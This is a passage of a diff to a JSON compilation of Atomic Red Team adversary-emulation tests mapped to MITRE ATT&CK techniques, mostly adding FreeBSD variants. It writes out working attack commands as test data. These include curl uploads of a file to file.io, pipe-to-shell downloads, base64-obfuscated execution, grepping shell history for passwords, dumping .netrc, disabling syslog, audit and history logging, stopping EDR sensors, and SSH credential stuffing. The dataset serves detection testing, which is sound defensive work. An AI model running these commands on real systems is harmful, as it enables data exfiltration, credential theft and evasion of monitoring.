$wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=subnet)\n", @@ -373603,7 +374945,7 @@ { "name": "System Network Configuration Discovery", "auto_generated_guid": "c141bbdb-7fca-4254-9fd6-f47e79447e17", - "description": "Identify network configuration information.\n\nUpon successful execution, sh will spawn multiple commands and output will be via stdout.\n", + "description": "Identify network configuration information.\nUpon successful execution, sh will spawn multiple commands and output will be via stdout.\n", "supported_platforms": [ "macos", "linux" @@ -373617,7 +374959,7 @@ } ], "executor": { - "command": "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "command": "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"netstat -Sp tcp\"; else cmd=\"netstat -ant\"; fi;\nif [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", "name": "sh" } }, @@ -394094,7 +395436,9 @@ ], "command_list": [ "sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf\nif [ -f \"/etc/auditd.conf\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf\n", + "echo '#art_test_1562_006_1' >> /etc/security/audit_event\n", "if [ -f \"/etc/syslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf\nfi\nif [ -f \"/etc/rsyslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf\nfi\nif [ -f \"/etc/syslog-ng/syslog-ng.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf\nfi\n", + "if [ -f \"/etc/syslog.conf\" ];\nthen echo '#art_test_1562_006_2' >> /etc/syslog.conf\nfi\n", "cmd /c \"\\..\\ExternalPayloads\\pstools\\PsExec.exe\" -accepteula -i -s cmd.exe /c logman update trace \"EventLog-Application\" --p \"Microsoft-Windows-Powershell\" -ets", "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", "New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force", @@ -394142,6 +395486,27 @@ "elevation_required": true } }, + { + "name": "Auditing Configuration Changes on FreeBSD Host", + "auto_generated_guid": "cedaf7e7-28ee-42ab-ba13-456abd35d1bd", + "description": "Emulates modification of auditd configuration files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "auditd_config_file_name": { + "description": "The name of the auditd configuration file to be changed", + "type": "string", + "default": "audit_event" + } + }, + "executor": { + "command": "echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}\n", + "cleanup_command": "sed -i \"\" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Logging Configuration Changes on Linux Host", "auto_generated_guid": "7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c", @@ -394173,6 +395538,27 @@ "elevation_required": true } }, + { + "name": "Logging Configuration Changes on FreeBSD Host", + "auto_generated_guid": "6b8ca3ab-5980-4321-80c3-bcd77c8daed8", + "description": "Emulates modification of syslog configuration.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "syslog_config_file_name": { + "description": "The name of the syslog configuration file to be changed", + "type": "string", + "default": "syslog.conf" + } + }, + "executor": { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}\nfi\n", + "cleanup_command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i \"\" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}\nfi\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Disable Powershell ETW Provider - Windows", "auto_generated_guid": "6f118276-121d-4c09-bb58-a8fb4a72ee84", @@ -410903,8 +412289,8 @@ "auto_generated_guid": "ffc8b249-372a-4b74-adcd-e4c0430842de", "description": "Find or discover files on the file system\n\nReferences:\n\nhttp://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/\n\nhttps://perishablepress.com/list-files-folders-recursively-terminal/\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "output_file": { @@ -410924,8 +412310,8 @@ "auto_generated_guid": "13c5e1ae-605b-46c4-a79f-db28c77ff24e", "description": "Find or discover files on the file system\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "output_file": { @@ -420493,7 +421879,7 @@ } }, { - "name": "System Network Connections Discovery Linux & MacOS", + "name": "System Network Connections Discovery FreeBSD, Linux & MacOS", "auto_generated_guid": "9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2", "description": "Get a listing of network connections.\n\nUpon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.\n", "supported_platforms": [ @@ -432222,6 +433608,7 @@ ], "command_list": [ "cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > ~/loot.txt\n", + "cat ~/.history | grep -e '-p ' -e 'pass' -e 'ssh' > ~/loot.txt\n", "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null", "cat ~/.bash_history" ], @@ -432264,6 +433651,35 @@ "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}\n", "name": "sh" } + }, + { + "name": "Search Through sh History", + "auto_generated_guid": "d87d3b94-05b4-40f2-a80f-99864ffa6803", + "description": "Search through sh history for specifice commands we want to capture\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "path", + "default": "~/loot.txt" + }, + "sh_history_grep_args": { + "description": "grep arguments that filter out specific commands we want to capture", + "type": "path", + "default": "-e '-p ' -e 'pass' -e 'ssh'" + }, + "sh_history_filename": { + "description": "Path of the sh history file to capture", + "type": "path", + "default": "~/.history" + } + }, + "executor": { + "command": "cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file}\n", + "name": "sh" + } } ] } @@ -435938,8 +437354,8 @@ "auto_generated_guid": "bd4cf0d1-7646-474e-8610-78ccf5a097c4", "description": "Extracting credentials from files\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "file_path": { @@ -435983,8 +437399,8 @@ "auto_generated_guid": "da4f751a-020b-40d7-b9ff-d433b7799803", "description": "This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "file_path": { @@ -442737,10 +444153,37 @@ "phase_name": "discovery" } ], - "command_list": [], + "command_list": [ + "powershell -c \"get-eventlog 'Security' | where {$_.Message -like '*SYSTEM*'} | export-csv $env:temp\\T1654_events.txt\"" + ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1654/T1654.yaml", + "name": "Atomic Red Team Test - Log Enumeration", + "content": { + "attack_technique": "T1654", + "display_name": "Log Enumeration", + "atomic_tests": [ + { + "name": "Get-EventLog To Enumerate Windows Security Log", + "auto_generated_guid": "a9030b20-dd4b-4405-875e-3462c6078fdc", + "description": "Uses the built-in PowerShell commandlet Get-EventLog to search for 'SYSTEM' keyword and saves results to a text file.\n\nThis technique was observed in a [TheDFIRReport case](https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/) \nwhere the threat actor enumerated the Windows Security audit log to determine user accounts and associated IPv4 addresses.\n\nSuccessful execution will save matching log events to the users temp folder.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "powershell -c \"get-eventlog 'Security' | where {$_.Message -like '*SYSTEM*'} | export-csv $env:temp\\T1654_events.txt\"", + "cleanup_command": "powershell -c \"remove-item $env:temp\\T1654_events.txt -ErrorAction Ignore\"", + "name": "powershell", + "elevation_required": true + } + } + ] + } + } + ], "possible_detections": [], "external_reference": [], "controls": [], @@ -454562,7 +456005,7 @@ } ], "command_list": [ - "C:\\Windows\\System32\\Curl.exe -F 'file=@/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n", + "C:\\Windows\\System32\\Curl.exe -k -F \"file=@/T1048.002/src/artifact\" https://file.io/\n", "curl -F 'file=@/T1048.002/src/artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n" ], "commands": [], @@ -454610,11 +456053,11 @@ "executor": { "name": "command_prompt", "elevation_required": false, - "command": "#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/\n" + "command": "#{curl_path} -k -F \"file=@#{input_file}\" https://file.io/\n" } }, { - "name": "Exfiltrate data HTTPS using curl linux", + "name": "Exfiltrate data HTTPS using curl freebsd,linux or macos", "auto_generated_guid": "4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01", "description": "Exfiltrate data HTTPS using curl to file share site file.io\n", "supported_platforms": [ @@ -457288,8 +458731,8 @@ "auto_generated_guid": "4ff64f0b-aaf2-4866-b39d-38d9791407cc", "description": "Utilize ps to identify processes.\n\nUpon successful execution, sh will execute ps and output to /tmp/loot.txt.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "output_file": { @@ -457791,10 +459234,13 @@ ], "command_list": [ "export HISTCONTROL=ignoreboth\nwhoami\n", + "export HISTSIZE=0\nwhoami\n", "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE; fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif [ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n", "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\" ]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE # \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls -la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif [ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\"; fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif [ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls -la $HISTFILE\"; fi\n", "TEST=$(echo $HISTFILESIZE)\necho $HISTFILESIZE\nexport HISTFILESIZE=0\nif [ $(echo $HISTFILESIZE) -eq 0 ]; then echo \"\\$HISTFILESIZE is zero\"; fi\n# -> $HISTFILESIZE is zero\n", + "echo $HISTSIZE\nexport HISTSIZE=0\nif [ $(echo $HISTSIZE) -eq 0 ]; then echo \"\\$HISTSIZE is zero\"; fi\n# -> $HISTSIZE is zero\n", "TEST=$(echo $HISTFILE)\necho $HISTFILE\nexport HISTFILE=\"/dev/null\"\nif [ $(echo $HISTFILE) == \"/dev/null\" ]; then echo \"\\$HISTFILE is /dev/null\"; fi\n# -> $HISTFILE is /dev/null\n", + "echo $HISTFILE\nexport HISTFILE=\"/dev/null\"\nif [ $(echo $HISTFILE) == \"/dev/null\" ]; then echo \"\\$HISTFILE is /dev/null\"; fi\n# -> $HISTFILE is /dev/null\n", "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la ~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE = *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo \"History cache is empty\"; fi\n# -> History cache is empty\n" ], "commands": [], @@ -457827,6 +459273,25 @@ "name": "sh" } }, + { + "name": "Disable history collection (freebsd)", + "auto_generated_guid": "cada55b4-8251-4c60-819e-8ec1b33c9306", + "description": "Disables history collection in shells\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "evil_command": { + "description": "Command to run after shell history collection is disabled", + "type": "string", + "default": "whoami" + } + }, + "executor": { + "command": "export HISTSIZE=0\n#{evil_command}\n", + "name": "sh" + } + }, { "name": "Mac HISTCONTROL", "auto_generated_guid": "468566d5-83e5-40c1-b338-511e1659628d", @@ -457882,6 +459347,20 @@ "cleanup_command": "export HISTCONTROL=$(echo $TEST)\n" } }, + { + "name": "Setting the HISTSIZE environment variable", + "auto_generated_guid": "386d3850-2ce7-4508-b56b-c0558922c814", + "description": "An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.\n\nNote: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo $HISTSIZE\nexport HISTSIZE=0\nif [ $(echo $HISTSIZE) -eq 0 ]; then echo \"\\$HISTSIZE is zero\"; fi\n# -> $HISTSIZE is zero\n", + "cleanup_command": "export HISTSIZE=100\n" + } + }, { "name": "Setting the HISTFILE environment variable", "auto_generated_guid": "b3dacb6c-a9e3-44ec-bf87-38db60c5cad1", @@ -457896,6 +459375,20 @@ "cleanup_command": "export HISTFILE=$(echo $TEST)\n" } }, + { + "name": "Setting the HISTFILE environment variable (freebsd)", + "auto_generated_guid": "f7308845-6da8-468e-99f2-4271f2f5bb67", + "description": "An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.\n\nNote: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo $HISTFILE\nexport HISTFILE=\"/dev/null\"\nif [ $(echo $HISTFILE) == \"/dev/null\" ]; then echo \"\\$HISTFILE is /dev/null\"; fi\n# -> $HISTFILE is /dev/null\n", + "cleanup_command": "export HISTFILE=~/.sh_history\n" + } + }, { "name": "Setting the HISTIGNORE environment variable", "auto_generated_guid": "f12acddb-7502-4ce6-a146-5b62c59592f1", @@ -484731,8 +486224,8 @@ "auto_generated_guid": "952931a4-af0b-4335-bbbe-73c8c5b327ae", "description": "Permission Groups Discovery\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "if [ -x \"$(command -v dscacheutil)\" ]; then dscacheutil -q group; else echo \"dscacheutil is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v dscl)\" ]; then dscl . -list /Groups; else echo \"dscl is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v groups)\" ]; then groups; else echo \"groups is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v id)\" ]; then id; else echo \"id is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v getent)\" ]; then getent group; else echo \"getent is missing from the machine. skipping...\"; fi;\ncat /etc/group\n", @@ -504234,7 +505727,8 @@ "& \"PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\"\n", "invoke-expression 'cmd /c start powershell -Command {cmd /c \"\\..\\ExternalPayloads\\tor\\Tor\\tor.exe\"}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", "sudo systemctl start tor \n", - "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n" + "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n", + "sysrc tor_enable=\"YES\"\nservice tor start\n" ], "commands": [], "queries": [], @@ -504323,7 +505817,8 @@ "executor": { "command": "sudo systemctl start tor \n", "cleanup_command": "sudo systemctl stop tor\n", - "name": "sh" + "name": "sh", + "elevation_required": true } }, { @@ -504346,6 +505841,28 @@ "cleanup_command": "killall tor > /dev/null 2>&1\n", "name": "sh" } + }, + { + "name": "Tor Proxy Usage - FreeBSD", + "auto_generated_guid": "550ec67d-a99e-408b-816a-689271b27d2a", + "description": "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.\nUpon successful execution, the tor proxy service will be launched. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Tor must be installed on the machine \n", + "prereq_command": "if [ -x \"$(command -v tor --version)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "pkg install -y tor\n" + } + ], + "executor": { + "command": "sysrc tor_enable=\"YES\"\nservice tor start\n", + "cleanup_command": "service tor stop\nsysrc -x tor_enable\n", + "name": "sh", + "elevation_required": true + } } ] } @@ -510277,8 +511794,12 @@ "cat /etc/shells \n", "for i in $(seq 1 5); do echo \"$i, Atomic Red Team was here!\"; sleep 1; done\n", "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |base64 -d |/bin/bash\nunset ART \n", + "ART=$(echo -n \"id\" |b64encode -r -)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |b64decode -r |/bin/sh\nunset ART\n", "useradd -s /bin/bash art\ncat /etc/passwd |grep ^art\nchsh -s /bin/sh art\ncat /etc/passwd |grep ^art\n", + "pw useradd art -g wheel -s /bin/csh\ncat /etc/passwd |grep ^art\nchsh -s /bin/sh art\ncat /etc/passwd |grep ^art\n", "export ART='echo \"Atomic Red Team was here... T1059.004\"'\necho $ART |/bin/bash\n", + "export ART='echo \"Atomic Red Team was here... T1059.004\"'\necho $ART |/bin/sh\n", + "cd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh\nls -la /tmp/art.txt\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash\nls -la /tmp/art.txt \n", "cd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh\nls -la /tmp/art.txt\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash\nls -la /tmp/art.txt \n", "uname -srm\n", "nohup ./sandcat.go -server #{server} &\n", @@ -510297,10 +511818,10 @@ { "name": "Create and Execute Bash Shell Script", "auto_generated_guid": "7e7ac3ed-f795-4fa5-b711-09d6fbe9b873", - "description": "Creates and executes a simple bash script.\n", + "description": "Creates and executes a simple sh script.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "script_path": { @@ -510320,8 +511841,8 @@ "auto_generated_guid": "d0c88567-803d-4dca-99b4-7ce65e7b257c", "description": "Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.\n\nUpon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", @@ -510460,6 +511981,19 @@ "command": "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |base64 -d |/bin/bash\nunset ART \n" } }, + { + "name": "Obfuscated command line scripts (freebsd)", + "auto_generated_guid": "5dc1d9dd-f396-4420-b985-32b1c4f79062", + "description": "An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "ART=$(echo -n \"id\" |b64encode -r -)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |b64decode -r |/bin/sh\nunset ART\n" + } + }, { "name": "Change login shell", "auto_generated_guid": "c7ac59cb-13cc-4622-81dc-6d2fee9bfac7", @@ -510481,6 +512015,27 @@ "cleanup_command": "userdel art\n" } }, + { + "name": "Change login shell (freebsd)", + "auto_generated_guid": "33b68b9b-4988-4caf-9600-31b7bf04227c", + "description": "An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user. \n", + "supported_platforms": [ + "linux" + ], + "dependencies": [ + { + "description": "chsh - change login shell, must be installed\n", + "prereq_command": "if [ -f /usr/bin/chsh ]; then echo \"exit 0\"; else echo \"exit 1\"; exit 1; fi\n", + "get_prereq_command": "echo \"Automated installer not implemented yet, please install chsh manually\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "pw useradd art -g wheel -s /bin/csh\ncat /etc/passwd |grep ^art\nchsh -s /bin/sh art\ncat /etc/passwd |grep ^art\n", + "cleanup_command": "rmuser -y art\n" + } + }, { "name": "Environment variable scripts", "auto_generated_guid": "bdaebd56-368b-4970-a523-f905ff4a8a51", @@ -510495,6 +512050,20 @@ "cleanup_command": "unset ART\n" } }, + { + "name": "Environment variable scripts (freebsd)", + "auto_generated_guid": "663b205d-2121-48a3-a6f9-8c9d4d87dfee", + "description": "An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "export ART='echo \"Atomic Red Team was here... T1059.004\"'\necho $ART |/bin/sh\n", + "cleanup_command": "unset ART\n" + } + }, { "name": "Detecting pipe-to-shell", "auto_generated_guid": "fca246a8-a585-4f28-a2df-6495973976a1", @@ -510524,6 +512093,35 @@ "cleanup_command": "rm /tmp/art.txt\n" } }, + { + "name": "Detecting pipe-to-shell (freebsd)", + "auto_generated_guid": "1a06b1ec-0cca-49db-a222-3ebb6ef25632", + "description": "An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "remote_url": { + "description": "url of remote payload", + "type": "url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a Debian based machine.\n", + "prereq_command": "if grep -iq \"FreeBSD\" /etc/os-release; then echo \"FreeBSD\"; else echo \"NOT FreeBSD\"; exit 1; fi\nif [ -x \"$(command -v curl)\" ]; then echo \"curl is installed\"; else echo \"curl is NOT installed\"; exit 1; fi\n", + "get_prereq_command": "pkg update && pkg install -y curl\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt \n", + "cleanup_command": "rm /tmp/art.txt \n" + } + }, { "name": "Current kernel information enumeration", "auto_generated_guid": "3a53734a-9e26-4f4b-ad15-059e767f5f14", @@ -511671,6 +513269,7 @@ ], "command_list": [ "systemctl stop rsyslog ; systemctl disable rsyslog\n", + "service syslogd stop\nsysrc syslogd_enable=\"NO\"\n", "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", "setenforce 0\n", "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", @@ -511774,6 +513373,20 @@ "elevation_required": true } }, + { + "name": "Disable syslog (freebsd)", + "auto_generated_guid": "db9de996-441e-4ae0-947b-61b6871e2fdf", + "description": "Disables syslog collection\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "service syslogd stop\nsysrc syslogd_enable=\"NO\"\n", + "cleanup_command": "sysrc syslogd_enable=\"YES\"\nservice syslogd start\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Disable Cb Response", "auto_generated_guid": "ae8943f7-0f8d-44de-962d-fbc2e2f03eb8", @@ -512490,7 +514103,7 @@ { "name": "Disable Memory Swap", "auto_generated_guid": "e74e4c63-6fde-4ad2-9ee8-21c3a1733114", - "description": "disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of linux.\n", + "description": "disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.\n", "supported_platforms": [ "linux" ], @@ -536296,6 +537909,7 @@ "command_list": [ "cp \"/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", "cp \"/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", + "cp /T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteforce --dc $ENV:userdnsdomain -d $ENV:userdomain \"\\..\\ExternalPayloads\\bruteforce.txt\" \n" ], "commands": [], @@ -536364,6 +537978,34 @@ "command": "cp \"$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt\" /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" } }, + { + "name": "SSH Credential Stuffing From FreeBSD", + "auto_generated_guid": "a790d50e-7ebf-48de-8daa-d9367e0911d4", + "description": "Using username,password combination from a password dump to login over SSH.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "target_host": { + "description": "IP Address / Hostname you want to target.", + "type": "string", + "default": "localhost" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires SSHPASS\n", + "prereq_command": "if [ -x \"$(command -v sshpass)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "pkg install -y sshpass\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + } + }, { "name": "Brute Force:Credential Stuffing using Kerbrute Tool", "auto_generated_guid": "4852c630-87a9-409b-bb5e-5dc12c9ebcde", @@ -538294,7 +539936,7 @@ } ], "command_list": [ - "cat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"b64decode -r\"; else cmd=\"base64 